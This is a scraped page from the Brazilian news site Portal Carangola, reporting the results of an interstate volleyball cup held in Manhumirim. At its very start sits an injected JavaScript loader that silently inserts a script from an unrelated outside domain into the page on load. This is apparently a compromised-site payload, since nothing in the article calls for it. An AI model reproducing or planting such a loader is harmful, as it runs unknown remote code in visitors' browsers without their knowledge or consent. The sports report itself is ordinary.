;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Copa Interestadual de Voleibol "Cidade de Manhumirim" Caratinga e Aviva Vôlei de Vila Velhas são as cidades campeãs. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Copa Interestadual de Voleibol “Cidade de Manhumirim” Caratinga e Aviva Vôlei de Vila Velhas são as cidades campeãs.

Equipes dos estados do ES, MG e RJ participaram em Manhumirim da Copa Interestadual de Voleibol. Os jogos aconteceram no Ginásio Poliesportivo Públio Nolasco, do dia 11 ao dia 13 de outubro. Aviva Vôlei – Vila Velha , Iron Hands – Manhuaçu , Código Secreto – Caratinga, U.V.I – Itaperuna , Cachu Vôlei – Cachoeiro de Itapemirim, MVS – Manhumirim, Master vôlei -Manhumirim foram as equipes participantes.
No feminino a decisão foi entre Caratinga e Manhumirim. Deu Caratinga, 03 sets a 0. Espera Feliz ficou com o terceiro lugar.
No Masculino, a decisão foi entre Espera Feliz e Viva Vôlei de Vila Velha, com vitória dos capixabas também por 3 sets a 0. Manhumirim disputou o terceiro lugar com a equipe da U.V.I de Itaperuna, e venceu por 3×0, ficando com o terceiro lugar.
Realização:
A realização da Competição foi do jovem, Ronald Assis, com apoio total da Prefeitura Municipal de Manhumirim, Secretaria de Esportes.